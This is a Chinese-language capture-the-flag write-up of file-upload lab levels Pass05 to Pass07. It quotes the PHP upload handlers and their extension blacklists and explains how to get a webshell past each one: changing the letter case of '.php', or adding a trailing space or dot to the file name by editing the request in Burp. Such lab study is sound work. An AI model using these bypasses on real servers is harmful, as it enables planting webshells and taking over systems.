- Pass05
很明顯這一題又是上一題的進階,但是對比原始碼后發現這一題似乎又少了些什么,
Pass04:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//洗掉檔案名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //轉換為小寫
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . $_FILES['upload_file']['name'];
$is_upload = true;
}
} else {
$msg = '此檔案不允許上傳!';
}
} else {
$msg = $UPLOAD_ADDR . '檔案夾不存在,請手工創建!';
}
}Pass05:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists($UPLOAD_ADDR)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//洗掉檔案名末尾的點
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $UPLOAD_ADDR . '/' . $_FILES['upload_file']['name'])) {
$img_path = $UPLOAD_ADDR . '/' . $file_name;
$is_upload = true;
}
} else {
$msg = '此檔案不允許上傳';
}
} else {
$msg = $UPLOAD_ADDR . '檔案夾不存在,請手工創建!';
}
}經過審計,發現Pass05缺少了轉換為小寫這一環節,因此可采用大小寫繞過,將webshell的后綴更換為.phP上傳即可,
- Pass06
查看提示很明顯跟Pass05是一系列的題目,但是這一題把上一題的大小寫繞過給修復了,因此只能另尋思路:
$file_ext = strtolower($file_ext); //轉換為小寫
經過一番簡單的比較發現,上一題的首尾去空本題不見了,因此很明顯這就是本題所希望我們利用的漏洞了:
$file_ext = trim($file_ext); //首尾去空
具體思路如下:上傳webshell檔案并使用bp截斷,修改檔案后綴名.php為.php ,即在后綴名后增加空格,然后即可成功上傳執行,
原理分析:由于使用的是windows系統搭建靶機,系統會自動對檔案名進行去空,而上傳的程序中使用的后綴名為.php ,由于后綴名并沒有被去空故不在黑名單之中,即可順利完成上傳并執行,同時注意,由于windows系統會自動對檔案名進行去空,所以在windows系統上操作時不能在本地提前修改后綴名而需使用bp截斷修改后綴名,
- Pass07
跟Pass06差不多的思路,這題的區別在與增加了上一題的首尾去空:
$file_ext = strtolower($file_ext); //轉換為小寫
但是上一題的洗掉檔案名末尾的點消失了,很明顯這一點就是我們這題所需要利用的漏洞,
$file_name = deldot($file_name);//洗掉檔案名末尾的點
因此將上一題的檔案用一樣的思路操作把末尾加空格改為加.就能輕松秒殺了,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289174.html
標籤:其他